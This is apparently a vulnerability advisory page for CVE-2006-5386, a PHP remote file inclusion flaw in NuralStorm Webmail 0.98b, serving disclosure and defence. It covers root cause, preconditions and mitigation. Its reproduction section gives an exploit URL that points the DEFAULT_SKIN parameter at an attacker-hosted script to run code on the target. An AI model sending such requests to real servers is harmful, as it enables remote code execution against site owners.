VYPR
← All advisories
Unrated severityNVD Advisory· Published Oct 18, 2006· Updated Jun 16, 2026

CVE-2006-5386

CVE-2006-5386

Description

PHP remote file inclusion vulnerability in process.php in NuralStorm Webmail 0.98b and earlier, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the DEFAULT_SKIN parameter.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Affected products

2
  • Nuralstorm/Webmail2 versions
    cpe:2.3:a:nuralstorm:nuralstorm_webmail:0.98b:*:*:*:*:*:*:*+ 1 more
    • cpe:2.3:a:nuralstorm:nuralstorm_webmail:0.98b:*:*:*:*:*:*:*
    • (no CPE)range: <=0.98b

Patches

Vulnerability mechanics

Root cause

"Missing input sanitization of the $DEFAULT_SKIN parameter in process.php allows remote file inclusion."

Attack vector

An attacker sends a crafted HTTP GET request to `process.php` with the `DEFAULT_SKIN` parameter set to a URL pointing to a malicious PHP script. Because `register_globals` must be enabled, the attacker-supplied value is automatically assigned to the `$DEFAULT_SKIN` variable. When the script includes this variable (likely in an `include()` or `require()` call), PHP fetches and executes the remote file, giving the attacker arbitrary code execution on the server [ref_id=1].

Affected code

The vulnerability exists in `process.php` of NuralStorm Webmail 0.98b and earlier. The `$DEFAULT_SKIN` parameter is used directly without sanitization, allowing inclusion of a remote file via a URL [ref_id=1].

What the fix does

No patch is provided in the bundle. The advisory recommends sanitizing the `$DEFAULT_SKIN` variable before use, and notes that disabling `register_globals` would also prevent the attack vector [ref_id=1]. Without a fix, administrators should disable `register_globals` in PHP configuration as a mitigation.

Preconditions

  • configPHP register_globals must be enabled on the server
  • networkAttacker must be able to send HTTP GET requests to the vulnerable process.php endpoint
  • inputThe DEFAULT_SKIN parameter is not sanitized before use in a file inclusion operation

Reproduction

Send a request to the vulnerable application: `http://www.site.com/[path]/process.php?DEFAULT_SKIN=http://attacker.com/evil_script.txt` [ref_id=1]. The remote PHP code at the attacker-controlled URL will be executed on the target server.

Generated on May 26, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

4

News mentions

0

No linked articles in our index yet.